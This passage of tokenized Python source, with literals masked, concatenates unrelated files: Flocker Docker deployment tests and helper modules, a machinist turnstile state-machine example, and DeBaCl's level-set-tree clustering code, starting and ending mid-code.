addCallback ( started ) <EOL> return d <EOL> @ if_docker_configured <EOL> def test_links ( self ) : <EOL> """<STR_LIT>""" <EOL> expected_variables = frozenset ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:localhost>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } . items ( ) ) <EOL> volume_service = create_volume_service ( self ) <EOL> docker_dir = FilePath ( __file__ ) . sibling ( '<STR_LIT>' ) <EOL> image = DockerImageBuilder ( test = self , source_dir = docker_dir ) <EOL> d = image . build ( ) <EOL> def image_built ( image_name ) : <EOL> application_name = random_name ( self ) <EOL> docker_client = DockerClient ( ) <EOL> self . addCleanup ( docker_client . remove , application_name ) <EOL> deployer = P2PNodeDeployer ( <EOL> u"<STR_LIT:localhost>" , volume_service , docker_client , <EOL> make_memory_network ( ) , node_uuid = uuid4 ( ) ) <EOL> link = Link ( alias = u"<STR_LIT>" , <EOL> local_port = <NUM_LIT> , <EOL> remote_port = <NUM_LIT> ) <EOL> dataset = Dataset ( <EOL> dataset_id = unicode ( uuid4 ( ) ) , <EOL> metadata = pmap ( { "<STR_LIT:name>" : application_name } ) ) <EOL> manifestation = Manifestation ( dataset = dataset , primary = True ) <EOL> desired_state = Deployment ( nodes = frozenset ( [ <EOL> Node ( uuid = deployer . node_uuid , <EOL> applications = frozenset ( [ Application ( <EOL> name = application_name , <EOL> image = DockerImage . from_string ( <EOL> image_name ) , <EOL> links = frozenset ( [ link ] ) , <EOL> volume = AttachedVolume ( <EOL> manifestation = manifestation , <EOL> mountpoint = FilePath ( '<STR_LIT>' ) , <EOL> ) , <EOL> ) ] ) , <EOL> manifestations = { <EOL> manifestation . dataset_id : manifestation } ) ] ) ) <EOL> return change_node_state ( deployer , desired_state ) <EOL> d . addCallback ( image_built ) <EOL> d . addCallback ( lambda _ : volume_service . enumerate ( ) ) <EOL> d . addCallback ( lambda volumes : <EOL> list ( volumes ) [ <NUM_LIT:0> ] . get_filesystem ( ) . 
get_path ( ) . child ( <EOL> b'<STR_LIT>' ) ) <EOL> def got_result_path ( result_path ) : <EOL> d = loop_until ( reactor , result_path . exists ) <EOL> d . addCallback ( lambda _ : result_path ) <EOL> return d <EOL> d . addCallback ( got_result_path ) <EOL> def started ( result_path ) : <EOL> contents = result_path . getContent ( ) <EOL> assertContainsAll ( <EOL> haystack = contents , <EOL> test_case = self , <EOL> needles = [ '<STR_LIT>' . format ( k , v ) <EOL> for k , v in expected_variables ] ) <EOL> d . addCallback ( started ) <EOL> return d <EOL> def _start_container_for_introspection ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> application_name = random_name ( self ) <EOL> docker_client = DockerClient ( ) <EOL> self . addCleanup ( docker_client . remove , application_name ) <EOL> deployer = ApplicationNodeDeployer ( <EOL> u"<STR_LIT:localhost>" , docker_client , <EOL> make_memory_network ( ) , node_uuid = uuid4 ( ) ) <EOL> application = Application ( <EOL> name = application_name , <EOL> image = DockerImage . from_string ( u"<STR_LIT>" ) , <EOL> ** kwargs ) <EOL> desired_configuration = Deployment ( nodes = [ <EOL> Node ( uuid = deployer . node_uuid , <EOL> applications = [ application ] ) ] ) <EOL> d = change_node_state ( deployer , desired_configuration ) <EOL> d . addCallback ( lambda _ : deployer . discover_state ( <EOL> DeploymentState ( nodes = { <EOL> NodeState ( hostname = deployer . hostname , uuid = deployer . node_uuid , <EOL> applications = [ ] , <EOL> manifestations = { } , paths = { } , devices = { } ) , <EOL> } ) , <EOL> persistent_state = PersistentState ( ) , <EOL> ) ) <EOL> return d <EOL> @ if_docker_configured <EOL> def test_links_lowercase ( self ) : <EOL> """<STR_LIT>""" <EOL> link = Link ( alias = u"<STR_LIT>" , <EOL> local_port = <NUM_LIT> , <EOL> remote_port = <NUM_LIT> ) <EOL> d = self . 
_start_container_for_introspection ( <EOL> links = [ link ] , <EOL> command_line = [ u"<STR_LIT>" , u"<STR_LIT>" , u"<STR_LIT>" , u"<STR_LIT>" ] ) <EOL> d . addCallback ( <EOL> lambda results : self . assertIn ( <EOL> pset ( [ link ] ) , <EOL> [ app . links for app in results . node_state . applications ] ) ) <EOL> return d <EOL> @ if_docker_configured <EOL> def test_command_line_introspection ( self ) : <EOL> """<STR_LIT>""" <EOL> command_line = pvector ( [ u"<STR_LIT>" , u"<STR_LIT>" , u"<STR_LIT>" , u"<STR_LIT>" ] ) <EOL> d = self . _start_container_for_introspection ( command_line = command_line ) <EOL> d . addCallback ( <EOL> lambda results : self . assertIn ( <EOL> command_line , <EOL> [ app . command_line for app in results . node_state . applications ] ) ) <EOL> return d <EOL> @ if_docker_configured <EOL> def test_memory_limit ( self ) : <EOL> """<STR_LIT>""" <EOL> EXPECTED_MEMORY_LIMIT = <NUM_LIT> <EOL> image = DockerImage . from_string ( u"<STR_LIT>" ) <EOL> application_name = random_name ( self ) <EOL> docker_client = DockerClient ( ) <EOL> self . addCleanup ( docker_client . remove , application_name ) <EOL> deployer = ApplicationNodeDeployer ( <EOL> u"<STR_LIT:localhost>" , docker_client , make_memory_network ( ) , <EOL> node_uuid = uuid4 ( ) ) <EOL> desired_state = Deployment ( nodes = frozenset ( [ <EOL> Node ( uuid = deployer . node_uuid , <EOL> applications = frozenset ( [ Application ( <EOL> name = application_name , <EOL> image = image , <EOL> memory_limit = EXPECTED_MEMORY_LIMIT <EOL> ) ] ) ) ] ) ) <EOL> d = change_node_state ( deployer , desired_state ) <EOL> d . addCallback ( lambda _ : wait_for_unit_state ( <EOL> reactor , <EOL> docker_client , <EOL> application_name , <EOL> [ u'<STR_LIT>' ] ) <EOL> ) <EOL> def inspect_application ( _ ) : <EOL> deferred_list = docker_client . list ( ) <EOL> def app_memory ( unit ) : <EOL> self . assertEqual ( unit . mem_limit , EXPECTED_MEMORY_LIMIT ) <EOL> deferred_list . 
addCallback ( find_unit , application_name ) <EOL> deferred_list . addCallback ( app_memory ) <EOL> return deferred_list <EOL> d . addCallback ( inspect_application ) <EOL> return d <EOL> @ flaky ( u'<STR_LIT>' ) <EOL> @ if_docker_configured <EOL> def test_cpu_shares ( self ) : <EOL> """<STR_LIT>""" <EOL> EXPECTED_CPU_SHARES = <NUM_LIT> <EOL> image = DockerImage . from_string ( u"<STR_LIT>" ) <EOL> application_name = random_name ( self ) <EOL> docker_client = DockerClient ( ) <EOL> self . addCleanup ( docker_client . remove , application_name ) <EOL> deployer = ApplicationNodeDeployer ( <EOL> u"<STR_LIT:localhost>" , docker_client , make_memory_network ( ) , <EOL> node_uuid = uuid4 ( ) ) <EOL> desired_state = Deployment ( nodes = frozenset ( [ <EOL> Node ( uuid = deployer . node_uuid , <EOL> applications = frozenset ( [ Application ( <EOL> name = application_name , <EOL> image = image , <EOL> cpu_shares = EXPECTED_CPU_SHARES <EOL> ) ] ) ) ] ) ) <EOL> d = change_node_state ( deployer , desired_state ) <EOL> d . addCallback ( lambda _ : wait_for_unit_state ( <EOL> reactor , <EOL> docker_client , <EOL> application_name , <EOL> [ u'<STR_LIT>' ] ) <EOL> ) <EOL> def inspect_application ( _ ) : <EOL> deferred_list = docker_client . list ( ) <EOL> def app_cpu_shares ( unit ) : <EOL> self . assertEqual ( unit . cpu_shares , EXPECTED_CPU_SHARES ) <EOL> deferred_list . addCallback ( find_unit , application_name ) <EOL> deferred_list . addCallback ( app_cpu_shares ) <EOL> return deferred_list <EOL> d . addCallback ( inspect_application ) <EOL> return d </s>
<s> from . _model import ( <EOL> run_network_interacting_from_args , sudo_network_interacting_from_args , <EOL> Run , run , run_from_args , <EOL> Sudo , sudo , sudo_from_args , <EOL> Put , put , <EOL> Comment , comment , <EOL> RunRemotely , run_remotely , <EOL> perform_comment , perform_put , perform_sudo <EOL> ) <EOL> __all__ = [ <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> ] <EOL> try : <EOL> from . _keys import ( <EOL> ensure_agent_has_ssh_key , <EOL> AgentNotFound , KeyNotFound <EOL> ) <EOL> __all__ += [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" <EOL> ] <EOL> except ImportError : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from zope . interface import Attribute , Interface <EOL> class INetwork ( Interface ) : <EOL> """<STR_LIT>""" <EOL> logger = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def create_proxy_to ( ip , port ) : <EOL> """<STR_LIT>""" <EOL> def delete_proxy ( proxy ) : <EOL> """<STR_LIT>""" <EOL> def open_port ( port ) : <EOL> """<STR_LIT>""" <EOL> def delete_open_port ( port ) : <EOL> """<STR_LIT>""" <EOL> def enumerate_proxies ( ) : <EOL> """<STR_LIT>""" <EOL> def enumerate_open_ports ( ) : <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from . . cluster_utils import TestTypes , make_cluster_id , MARKER <EOL> from ... testtools import TestCase <EOL> class MakeClusterIdTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_values_extracted ( self ) : <EOL> """<STR_LIT>""" <EOL> cluster_id = make_cluster_id ( TestTypes . ACCEPTANCE ) <EOL> self . assertEqual ( <EOL> ( TestTypes . ACCEPTANCE . value , MARKER ) , <EOL> ( cluster_id . clock_seq_hi_variant , cluster_id . node ) , <EOL> ) </s>
<s> import time <EOL> from twisted . python . constants import Names , NamedConstant <EOL> from machinist import ( <EOL> TransitionTable , MethodSuffixOutputer , constructFiniteStateMachine , <EOL> ) <EOL> from turnstilelib import TurnstileController <EOL> class TurnstileInput ( Names ) : <EOL> FARE_PAID = NamedConstant ( ) <EOL> ARM_UNLOCKED = NamedConstant ( ) <EOL> ARM_TURNED = NamedConstant ( ) <EOL> ARM_LOCKED = NamedConstant ( ) <EOL> class TurnstileOutput ( Names ) : <EOL> ENGAGE_LOCK = NamedConstant ( ) <EOL> DISENGAGE_LOCK = NamedConstant ( ) <EOL> class TurnstileState ( Names ) : <EOL> LOCKED = NamedConstant ( ) <EOL> UNLOCKED = NamedConstant ( ) <EOL> ACTIVE = NamedConstant ( ) <EOL> table = TransitionTable ( ) <EOL> table = table . addTransitions ( <EOL> TurnstileState . UNLOCKED , { <EOL> TurnstileInput . ARM_TURNED : <EOL> ( [ TurnstileOutput . ENGAGE_LOCK ] , TurnstileState . ACTIVE ) , <EOL> } ) <EOL> table = table . addTransitions ( <EOL> TurnstileState . ACTIVE , { <EOL> TurnstileInput . ARM_LOCKED : ( [ ] , TurnstileState . LOCKED ) , <EOL> TurnstileInput . ARM_UNLOCKED : ( [ ] , TurnstileState . UNLOCKED ) , <EOL> } ) <EOL> table = table . addTransitions ( <EOL> TurnstileState . LOCKED , { <EOL> TurnstileInput . FARE_PAID : <EOL> ( [ TurnstileOutput . DISENGAGE_LOCK ] , TurnstileState . ACTIVE ) , <EOL> } ) <EOL> class Turnstile ( object ) : <EOL> def __init__ ( self , hardware ) : <EOL> self . _hardware = hardware <EOL> def output_ENGAGE_LOCK ( self , engage ) : <EOL> self . _hardware . engageLock ( ) <EOL> def output_DISENGAGE_LOCK ( self , disengage ) : <EOL> self . _hardware . disengageLock ( ) <EOL> def main ( ) : <EOL> hardware = TurnstileController ( digitalPin = <NUM_LIT> ) <EOL> turnstileFSM = constructFiniteStateMachine ( <EOL> inputs = TurnstileInput , <EOL> outputs = TurnstileOutput , <EOL> states = TurnstileState , <EOL> table = table , <EOL> initial = TurnstileState . 
LOCKED , <EOL> richInputs = [ ] , <EOL> inputContext = { } , <EOL> world = MethodSuffixOutputer ( Turnstile ( hardware ) ) , <EOL> ) <EOL> while True : <EOL> if hardware . paymentMade ( ) : <EOL> hardware . resetNotification ( ) <EOL> turnstileFSM . receive ( TurnstileInput . FARE_PAID ) <EOL> elif hardware . armTurned ( ) : <EOL> hardware . resetNotification ( ) <EOL> turnstileFSM . receive ( TurnstileInput . ARM_TURNED ) <EOL> elif hardware . finishedLocking ( ) : <EOL> hardware . resetNotification ( ) <EOL> turnstileFSM . receive ( TurnstileInput . ARM_LOCKED ) <EOL> elif hardware . finishedUnlocking ( ) : <EOL> hardware . resetNotification ( ) <EOL> turnstileFSM . receive ( TurnstileInput . ARM_UNLOCKED ) <EOL> else : <EOL> time . sleep ( <NUM_LIT:0.1> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function as _print_function <EOL> from __future__ import absolute_import as _absolute_import <EOL> import logging as _logging <EOL> import copy as _copy <EOL> import pickle as _pickle <EOL> import debacl . utils as _utl <EOL> _logging . basicConfig ( level = _logging . INFO , datefmt = '<STR_LIT>' , <EOL> format = '<STR_LIT>' ) <EOL> try : <EOL> import numpy as _np <EOL> import networkx as _nx <EOL> from prettytable import PrettyTable as _PrettyTable <EOL> except : <EOL> raise ImportError ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> try : <EOL> import matplotlib . pyplot as _plt <EOL> from matplotlib . collections import LineCollection as _LineCollection <EOL> _HAS_MPL = True <EOL> except : <EOL> _HAS_MPL = False <EOL> _logging . warning ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> class ConnectedComponent ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , idnum , parent , children , start_level , end_level , <EOL> start_mass , end_mass , members ) : <EOL> self . idnum = idnum <EOL> self . parent = parent <EOL> self . children = children <EOL> self . start_level = start_level <EOL> self . end_level = end_level <EOL> self . start_mass = start_mass <EOL> self . end_mass = end_mass <EOL> self . members = members <EOL> class LevelSetTree ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , density = [ ] , levels = [ ] ) : <EOL> self . density = density <EOL> self . levels = levels <EOL> self . num_levels = len ( levels ) <EOL> self . prune_threshold = None <EOL> self . nodes = { } <EOL> self . _subgraphs = { } <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __str__ ( ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> summary = _PrettyTable ( [ "<STR_LIT:id>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:size>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> for node_id , v in self . nodes . items ( ) : <EOL> summary . add_row ( [ node_id , <EOL> v . 
start_level , <EOL> v . end_level , <EOL> v . start_mass , <EOL> v . end_mass , <EOL> len ( v . members ) , <EOL> v . parent , <EOL> v . children ] ) <EOL> for col in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> summary . float_format [ col ] = "<STR_LIT>" <EOL> return summary . get_string ( ) <EOL> def prune ( self , threshold ) : <EOL> """<STR_LIT>""" <EOL> return self . _merge_by_size ( threshold ) <EOL> def save ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> with open ( filename , '<STR_LIT:wb>' ) as f : <EOL> _pickle . dump ( self , f , _pickle . HIGHEST_PROTOCOL ) <EOL> def plot ( self , form = '<STR_LIT>' , horizontal_spacing = '<STR_LIT>' , color_nodes = [ ] , <EOL> colormap = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( color_nodes , list ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if not set ( color_nodes ) . issubset ( self . nodes . keys ( ) ) : <EOL> raise ValueError ( "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> gap = <NUM_LIT> <EOL> min_node_width = <NUM_LIT> <EOL> node_coords = { } <EOL> split_coords = { } <EOL> ix_root = _np . array ( [ k for k , v in self . nodes . iteritems ( ) <EOL> if v . parent is None ] ) <EOL> n_root = len ( ix_root ) <EOL> census = _np . array ( [ len ( self . nodes [ x ] . members ) for x in ix_root ] , <EOL> dtype = _np . float ) <EOL> n = sum ( census ) <EOL> seniority = _np . argsort ( census ) [ : : - <NUM_LIT:1> ] <EOL> ix_root = ix_root [ seniority ] <EOL> census = census [ seniority ] <EOL> if horizontal_spacing == '<STR_LIT>' : <EOL> weights = census / n <EOL> intervals = _np . cumsum ( weights ) <EOL> intervals = _np . insert ( intervals , <NUM_LIT:0> , <NUM_LIT:0.0> ) <EOL> else : <EOL> intervals = _np . linspace ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , n_root + <NUM_LIT:1> ) <EOL> for i , ix in enumerate ( ix_root ) : <EOL> if form == '<STR_LIT>' : <EOL> branch = self . 
_construct_mass_map ( <EOL> ix , <NUM_LIT:0.0> , ( intervals [ i ] , intervals [ i + <NUM_LIT:1> ] ) , <EOL> horizontal_spacing ) <EOL> else : <EOL> branch = self . _construct_branch_map ( <EOL> ix , ( intervals [ i ] , intervals [ i + <NUM_LIT:1> ] ) , form , <EOL> horizontal_spacing , sort = True ) <EOL> branch_node_coords , branch_split_coords , _ , _ = branch <EOL> node_coords . update ( branch_node_coords ) <EOL> split_coords . update ( branch_split_coords ) <EOL> node_widths = { k : max ( min_node_width , <NUM_LIT> * len ( node . members ) / n ) <EOL> for k , node in self . nodes . items ( ) } <EOL> primary_ticks = [ ( x [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , x [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) for x in node_coords . values ( ) ] <EOL> primary_ticks = _np . unique ( _np . array ( primary_ticks ) . flatten ( ) ) <EOL> primary_labels = [ str ( round ( tick , <NUM_LIT:2> ) ) for tick in primary_ticks ] <EOL> fig , ax = _plt . subplots ( ) <EOL> ax . set_position ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> ax . set_xlim ( ( - <NUM_LIT> , <NUM_LIT> ) ) <EOL> ax . set_xticks ( [ ] ) <EOL> ax . set_xticklabels ( [ ] ) <EOL> ax . yaxis . grid ( color = '<STR_LIT>' ) <EOL> ax . set_yticks ( primary_ticks ) <EOL> ax . set_yticklabels ( primary_labels ) <EOL> if form == '<STR_LIT>' : <EOL> kappa_max = max ( primary_ticks ) <EOL> ax . set_ylim ( ( - <NUM_LIT:1.0> * gap * kappa_max , <NUM_LIT> * kappa_max ) ) <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> elif form == '<STR_LIT>' : <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ymin = min ( [ v . start_level for v in self . nodes . itervalues ( ) ] ) <EOL> ymax = max ( [ v . end_level for v in self . nodes . itervalues ( ) ] ) <EOL> rng = ymax - ymin <EOL> ax . set_ylim ( ymin - gap * rng , ymax + <NUM_LIT> * rng ) <EOL> elif form == '<STR_LIT>' : <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ymin = min ( [ v . start_mass for v in self . nodes . itervalues ( ) ] ) <EOL> ymax = max ( [ v . end_mass for v in self . 
nodes . itervalues ( ) ] ) <EOL> rng = ymax - ymin <EOL> ax . set_ylim ( ymin - gap * rng , ymax + <NUM_LIT> * ymax ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> node_colors = { k : [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ] for k , v in self . nodes . items ( ) } <EOL> palette = _plt . get_cmap ( colormap ) <EOL> colorset = palette ( _np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , len ( color_nodes ) ) ) <EOL> for i , ix in enumerate ( color_nodes ) : <EOL> subtree = self . _make_subtree ( ix ) <EOL> for ix_sub in subtree . nodes . keys ( ) : <EOL> node_colors [ ix_sub ] = list ( colorset [ i ] ) <EOL> line_coords = [ node_coords [ c ] for c in node_coords . keys ( ) ] <EOL> line_widths = [ node_widths [ c ] for c in node_coords . keys ( ) ] <EOL> line_colors = [ node_colors [ c ] for c in node_coords . keys ( ) ] <EOL> node_lines = _LineCollection ( line_coords , linewidths = line_widths , <EOL> colors = line_colors ) <EOL> ax . add_collection ( node_lines ) <EOL> line_coords = [ split_coords [ c ] for c in split_coords . keys ( ) ] <EOL> line_colors = [ node_colors [ c ] for c in split_coords . keys ( ) ] <EOL> split_lines = _LineCollection ( line_coords , colors = line_colors ) <EOL> ax . add_collection ( split_lines ) <EOL> return fig , node_coords , split_coords , node_colors <EOL> def get_clusters ( self , method = '<STR_LIT>' , fill_background = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if method == '<STR_LIT>' : <EOL> labels = self . _leaf_cluster ( ) <EOL> elif method == '<STR_LIT>' : <EOL> required = set ( [ '<STR_LIT:k>' ] ) <EOL> if not set ( kwargs . keys ( ) ) . issuperset ( required ) : <EOL> raise ValueError ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> else : <EOL> k = kwargs . get ( '<STR_LIT:k>' ) <EOL> labels = self . _first_K_cluster ( k ) <EOL> elif method == '<STR_LIT>' : <EOL> required = set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if not set ( kwargs . keys ( ) ) . 
issuperset ( required ) : <EOL> raise ValueError ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> else : <EOL> threshold = kwargs . get ( '<STR_LIT>' ) <EOL> form = kwargs . get ( '<STR_LIT>' ) <EOL> labels = self . _upper_set_cluster ( threshold , form ) <EOL> elif method == '<STR_LIT>' : <EOL> required = set ( [ '<STR_LIT:k>' ] ) <EOL> if not set ( kwargs . keys ( ) ) . issuperset ( required ) : <EOL> raise ValueError ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> else : <EOL> k = kwargs . get ( '<STR_LIT:k>' ) <EOL> labels = self . _first_K_level_cluster ( k ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if fill_background : <EOL> n = len ( self . density ) <EOL> full_labels = _np . vstack ( ( _np . arange ( n ) , [ - <NUM_LIT:1> ] * n ) ) . T <EOL> full_labels [ labels [ : , <NUM_LIT:0> ] , <NUM_LIT:1> ] = labels [ : , <NUM_LIT:1> ] <EOL> labels = full_labels <EOL> return labels <EOL> def get_leaf_nodes ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ k for k , v in self . nodes . items ( ) if v . children == [ ] ] <EOL> def branch_partition ( self ) : <EOL> """<STR_LIT>""" <EOL> points = [ ] <EOL> labels = [ ] <EOL> for ix , node in self . nodes . items ( ) : <EOL> branch_members = node . members . copy ( ) <EOL> for ix_child in node . children : <EOL> child_node = self . nodes [ ix_child ] <EOL> branch_members . difference_update ( child_node . members ) <EOL> points . extend ( branch_members ) <EOL> labels += ( [ ix ] * len ( branch_members ) ) <EOL> partition = _np . array ( [ points , labels ] , dtype = _np . int ) . T <EOL> return partition <EOL> def _make_subtree ( self , ix ) : <EOL> """<STR_LIT>""" <EOL> T = LevelSetTree ( ) <EOL> T . nodes [ ix ] = _copy . deepcopy ( self . nodes [ ix ] ) <EOL> T . nodes [ ix ] . parent = None <EOL> queue = self . nodes [ ix ] . children [ : ] <EOL> while len ( queue ) > <NUM_LIT:0> : <EOL> branch_ix = queue . pop ( ) <EOL> T . nodes [ branch_ix ] = self . nodes [ branch_ix ] <EOL> queue += self . 
nodes [ branch_ix ] . children <EOL> return T <EOL> def _merge_by_size ( self , threshold ) : <EOL> """<STR_LIT>""" <EOL> tree = _copy . deepcopy ( self ) <EOL> tree . prune_threshold = threshold <EOL> small_roots = [ k for k , v in tree . nodes . iteritems ( ) <EOL> if v . parent is None and len ( v . members ) <= threshold ] <EOL> for root in small_roots : <EOL> root_tree = tree . _make_subtree ( root ) <EOL> for ix in root_tree . nodes . iterkeys ( ) : <EOL> del tree . nodes [ ix ] <EOL> parents = [ k for k , v in tree . nodes . iteritems ( ) <EOL> if len ( v . children ) >= <NUM_LIT:1> ] <EOL> parents = _np . sort ( parents ) [ : : - <NUM_LIT:1> ] <EOL> for ix_parent in parents : <EOL> parent = tree . nodes [ ix_parent ] <EOL> kid_size = { k : len ( tree . nodes [ k ] . members ) for k in parent . children } <EOL> n_bigkid = sum ( _np . array ( kid_size . values ( ) ) >= threshold ) <EOL> if n_bigkid == <NUM_LIT:0> : <EOL> parent . end_level = max ( [ tree . nodes [ k ] . end_level <EOL> for k in parent . children ] ) <EOL> parent . end_mass = max ( [ tree . nodes [ k ] . end_mass <EOL> for k in parent . children ] ) <EOL> for k in parent . children : <EOL> del tree . nodes [ k ] <EOL> parent . children = [ ] <EOL> elif n_bigkid == <NUM_LIT:1> : <EOL> pass <EOL> ix_bigkid = [ k for k , v in kid_size . iteritems ( ) <EOL> if v >= threshold ] [ <NUM_LIT:0> ] <EOL> bigkid = tree . nodes [ ix_bigkid ] <EOL> parent . end_level = bigkid . end_level <EOL> parent . end_mass = bigkid . end_mass <EOL> for c in bigkid . children : <EOL> tree . nodes [ c ] . parent = ix_parent <EOL> for k in parent . children : <EOL> if k != ix_bigkid : <EOL> del tree . nodes [ k ] <EOL> parent . children = bigkid . children <EOL> del tree . nodes [ ix_bigkid ] <EOL> else : <EOL> pass <EOL> return tree <EOL> def _leaf_cluster ( self ) : <EOL> """<STR_LIT>""" <EOL> leaves = self . get_leaf_nodes ( ) <EOL> points = [ ] <EOL> cluster = [ ] <EOL> for leaf in leaves : <EOL> points . 
extend ( self . nodes [ leaf ] . members ) <EOL> cluster += ( [ leaf ] * len ( self . nodes [ leaf ] . members ) ) <EOL> labels = _np . array ( [ points , cluster ] , dtype = _np . int ) . T <EOL> return labels <EOL> def _first_K_cluster ( self , k ) : <EOL> """<STR_LIT>""" <EOL> parents = _np . array ( [ u for u , v in self . nodes . items ( ) <EOL> if len ( v . children ) > <NUM_LIT:0> ] ) <EOL> roots = [ u for u , v in self . nodes . items ( ) if v . parent is None ] <EOL> splits = [ self . nodes [ u ] . end_level for u in parents ] <EOL> order = _np . argsort ( splits ) <EOL> star_parents = parents [ order [ : ( k - len ( roots ) ) ] ] <EOL> children = [ u for u , v in self . nodes . items ( ) if v . parent is None ] <EOL> for u in star_parents : <EOL> children += self . nodes [ u ] . children <EOL> nodes = [ x for x in children if <EOL> sum ( _np . in1d ( self . nodes [ x ] . children , children ) ) == <NUM_LIT:0> ] <EOL> points = [ ] <EOL> cluster = [ ] <EOL> for c in nodes : <EOL> cluster_pts = self . nodes [ c ] . members <EOL> points . extend ( cluster_pts ) <EOL> cluster += ( [ c ] * len ( cluster_pts ) ) <EOL> labels = _np . array ( [ points , cluster ] , dtype = _np . int ) . T <EOL> return labels <EOL> def _upper_set_cluster ( self , threshold , form = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if form == '<STR_LIT>' : <EOL> density_level = self . _mass_to_density ( mass = threshold ) <EOL> return self . _upper_set_cluster ( threshold = density_level , <EOL> form = '<STR_LIT>' ) <EOL> else : <EOL> upper_level_set = _np . where ( _np . array ( self . density ) > threshold ) [ <NUM_LIT:0> ] <EOL> active_nodes = [ k for k , v in self . nodes . iteritems ( ) <EOL> if ( v . start_level <= threshold and <EOL> v . end_level > threshold ) ] <EOL> points = [ ] <EOL> cluster = [ ] <EOL> for c in active_nodes : <EOL> cluster_mask = _np . in1d ( upper_level_set , <EOL> list ( self . nodes [ c ] . 
members ) ) <EOL> cluster_pts = upper_level_set [ cluster_mask ] <EOL> points . extend ( cluster_pts ) <EOL> cluster += ( [ c ] * len ( cluster_pts ) ) <EOL> labels = _np . array ( [ points , cluster ] , dtype = _np . int ) . T <EOL> return labels <EOL> def _first_K_level_cluster ( self , k ) : <EOL> """<STR_LIT>""" <EOL> cut = self . _find_K_cut ( k ) <EOL> nodes = [ e for e , v in self . nodes . iteritems ( ) <EOL> if v . start_level <= cut and v . end_level > cut ] <EOL> points = [ ] <EOL> cluster = [ ] <EOL> for c in nodes : <EOL> cluster_pts = self . nodes [ c ] . members <EOL> points . extend ( cluster_pts ) <EOL> cluster += ( [ c ] * len ( cluster_pts ) ) <EOL> labels = _np . array ( [ points , cluster ] , dtype = _np . int ) . T <EOL> return labels <EOL> def _collapse_leaves ( self , active_nodes ) : <EOL> """<STR_LIT>""" <EOL> for ix in active_nodes : <EOL> subtree = self . _make_subtree ( ix ) <EOL> max_end_level = max ( [ v . end_level for v in subtree . nodes . values ( ) ] ) <EOL> max_end_mass = max ( [ v . end_mass for v in subtree . nodes . values ( ) ] ) <EOL> self . nodes [ ix ] . end_level = max_end_level <EOL> self . nodes [ ix ] . end_mass = max_end_mass <EOL> self . nodes [ ix ] . children = [ ] <EOL> for u in subtree . nodes . keys ( ) : <EOL> if u != ix : <EOL> del self . nodes [ u ] <EOL> def _find_K_cut ( self , k ) : <EOL> """<STR_LIT>""" <EOL> starts = [ v . start_level for v in self . nodes . itervalues ( ) ] <EOL> ends = [ v . end_level for v in self . nodes . itervalues ( ) ] <EOL> crits = _np . unique ( starts + ends ) <EOL> nclust = { } <EOL> for c in crits : <EOL> nclust [ c ] = len ( [ e for e , v in self . nodes . iteritems ( ) <EOL> if v . start_level <= c and v . end_level > c ] ) <EOL> width = _np . max ( nclust . values ( ) ) <EOL> if k in nclust . values ( ) : <EOL> cut = _np . min ( [ e for e , v in nclust . iteritems ( ) if v == k ] ) <EOL> else : <EOL> if width < k : <EOL> cut = _np . min ( [ e for e , v in nclust . 
